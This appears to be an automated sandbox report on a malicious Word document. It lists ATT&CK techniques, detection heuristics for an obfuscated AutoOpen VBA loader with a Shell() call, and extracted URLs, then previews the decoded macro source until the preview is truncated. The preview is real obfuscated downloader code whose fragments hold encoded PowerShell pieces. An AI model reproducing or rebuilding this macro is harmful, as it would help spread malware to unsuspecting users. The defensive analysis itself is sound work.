MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the presence of a Shell() call and an auto-exec loader designed to execute code. The VBA script appears to be attempting to construct a URL for downloading a payload, as evidenced by the obfuscated string manipulation and the embedded unknown URLs.
Heuristics 7
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ccwclaihw+ihwssYhacjPHaSXnzSX� In document text (OLE body)
- http://ccwclaihw+ihwssYhacjPHaSXnzSXIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25435 bytes |
SHA-256: f2e92b5e9d2ae0c831417b1d9bf0bbf214f137580a0e0a4e1b9dd9fc0e1a8542 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wjIdphHG"
Function wpZdFWC()
On Error Resume Next
sdvmQjn = (GDYmq - Int(phzjj) * fXLrfajoLisdh / Oct(jTGus) - (zQXvcrQzZIFs - Sin(2969741)))
BSQmJaharV = (AnwjZD - Int(MscLuEoWWbF) * zuOAPOoKmOCZ / Oct(OZBsU) - (VoFkXukim - Sin(5259439)))
JIBRQLjsdl = (DhAESOlmiS - Int(tuwpDLjfndBB) * zsJrGffCiLK / Oct(YwvKQFlHk) - (KmhrYBHozBjQEa - Sin(980406)))
OKftamcDwJ = (PqEZwAfLJXFiQA) + HJjkJKD("NXzvmjnmf'w*MDr*ihw).NaoyD+oyDMe[3,11,2]-JoINihwihw)oyD).REPlace(oyD0froyD,oyDQk'+'1o+k1oiEoyD).REPla'+'ce(oyDihwoyD,[STRInG][CHar]39).REPlace(([CHar]122+SGDOrDffWavDYGwoK", 10, 145)
VSrwsR = (uNJpIrVFWYiUCk - Int(zNMJQmRZml) * AsikRwIn / Oct(VdfVXOPA) - (jZzTFWwCzNIdoW - Sin(612680)))
fnuTnK = (qdXmGmMOTGVhr - Int(BXQZFMShnLnP) * uimhHcdhlrOsuM / Oct(zzBOLLLkMOR) - (ZJpLwrnRjhYOF - Sin(2675191)))
lYDwqfoN = (QfCjL - Int(khoKZDnjtZSplD) * wjPBGuzSa / Oct(IzGvFKhGqpbB) - (Ynzip - Sin(1406052)))
jnJFMoTG = (PuzDhWJPGi) + HJjkJKD("OEtZq+ihwSpihw+ihwlit(8icQrQl", 6, 19)
DQHCnH = (ljuOwvf - Int(NHMJLUNonbbGX) * ClEMn / Oct(IhSuBrUpZv) - (YTvRwsbDtLc - Sin(3715011)))
ntiVXS = (LirjjI - Int(kHDijp) * ITzXOrsD / Oct(ckFtdItRfNMj) - (zlIQmwQQ - Sin(2413543)))
rpAqsqKiHp = (HaSkuoNcNIvP - Int(bPfbOmDScipTNO) * EtmWPwwSLYwdSl / Oct(aXknhBGWCdJSis) - (QhZOXUWYzA - Sin(5661562)))
mMpVzb = (fEEkPOYQGhno) + HJjkJKD("JStRinG][cHAR]39) F6h. ( VjnENV:PuBLic[13]+VjneNV:PuBlIC[5]+k1oxk1o)') -rEPlaCe 'k1o',[cHar]39-CRepLACE 'F6h',[cHar]124-CRepLwSitHBowuMjJiTUdMjJhrT", 2, 125)
FMBbGVjhnU = (OiEzl - Int(EEmTmUYlAkKi) * tRZzlf / Oct(TJWlwzFjSADSz) - (csLDzYhuTpYZ - Sin(2147846)))
LIkSj = (lojSUr - Int(uhAXoPrS) * jrkTQZNunHLYqh / Oct(XmwvdTl) - (GUiKKfJJpcTIjo - Sin(8453936)))
iDsUphVt = (MbmiNfuDAnACT - Int(ojvtiwiOCOizWw) * YjiuCjCjG / Oct(aaiKXfHqsnmN) - (KtLzYYAPJzjb - Sin(1288860)))
aDitj = (ktGjTZiHRD) + HJjkJKD("XwlIOpTcXrlwwUXzjw[CHar]67+[CHar]EUrrEFU", 19, 15)
waBbInb = (XBrliIGWQcwiQ - Int(zZfCnYj) * UHsspc / Oct(jowQNu) - (YbHril - Sin(7658399)))
DcwnWL = (EWOVXiwGzmMRhj - Int(lSdOknCRDTuBD) * vquSXDWiUFZhiz / Oct(AcYoiVZEWD) - (CELCdj - Sin(8978692)))
ZAahZFozJ = (BvSzKjW - Int(zYpCFD) * CqWMVZVmYOOA / Oct(TScsnWzi) - (dNILNbfjADz - Sin(3403545)))
lzBij = (DEfiXHdIkL) + HJjkJKD("nNPsDiRBwVzk+ihwid+8idihw+ihwk8ihw+ih'+'wid+8ideoyD+oyD-Iteihw+ihwm8iihw+ihwd)(Owihw+ihwtSihw+ihwDC'+')ihw+oyD+oyDihw;bomDFqIZDjFqnONuImzwrmtw", 13, 108)
EEhKPwbzlH = (PiFETMIEJLuGrN - Int(BAJGVY) * kRZotRc / Oct(ZwjklV) - (NpwwPQalCCWli - Sin(964562)))
vRWNSl = (YbYBwoiiTq - Int(CmzXHcpHmU) * WJwKfX / Oct(WjwBuXHLjWFj) - (fHnOnni - Sin(9045018)))
EQchzF = (wWSJQEOEoIGsw - Int(dArZQvs) * CDJcOWiW / Oct(srcjcjkHCziiw) - (SizJNvOOzB - Sin(5846635)))
ziiXpblCqR = (tkvfFofw) + HJjkJKD("fOjcNUWBliMlpaazWWvjYjfcwhROrwUyD+oyDihw+ihk1o+k1owrea'+'ihw+ihk1o+k1owk;}catch{ihwoyD+oyD+ihAatBHFDT", 32, 62)
qhvZzrqdww = (jFaruRM - Int(adirbEITk) * MFIRfORP / Oct(IwpvBBnuO) - (ItYfAqnkJrWs - Sin(9561315)))
bIkomtHfH = (zAsFSaMaf - Int(DYlhcqoKuicanZ) * brdHXA / Oct(wTzAIhco) - (iOibbEGHTD - Sin(2296454)))
TwQJBwAtC = (StWNTzqiiSHuoa - Int(jchGhFCu) * JzfWlWo / Oct(oQfZbnpj) - (FtPGjnBmWfmw - Sin(5872278)))
BmwadcfqL = (BTbBRGSNz) + HJjkJKD("pCQuIcSpZciJiNDzovmwwzqqrh83),oyD'+'bWYoyD))k1o).RePLacE(([cHAR]81+[cHAR]105+[cHAR]69),[StRinG][cH'+'AR]124).RePLacEIwTFjzZsLcPdI", 27, 90)
XaJpsz = (rCWJYPa - Int(kTRRJhkR) * QGtOquajsH / Oct(DdLojhUc) - (wzfSrEXE - Sin(5712240)))
BFLDqt = (buoztXqAAHwaf - Int(FNHIdh) * MIAjRbaWmW / Oct(FCfaOfSQs) - (UUUVTXNdzPb - Sin(9183188)))
llcvwITj = (PloQcwP - Int(OkbVdcfzbq) * ovrojKz / Oct(NsoHu) - (nPoZPp - Sin(3936028)))
OCTJSCnBJ = (sIorWvAJiGaJik) + HJjkJKD("wrZAWpWWZQjNSbid+8ihw+ihwid-objeihw+ihw'+'ct8id) SyihoyD+ok1o+k1oyDw+irGwzWTCvSHaJj", 15, 56)
UqjYpICL = (ZdhLqNqZMAsL - Int(mEnKHJjOSijCU) * rRILcbQjGLoAh / Oct(EJY
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.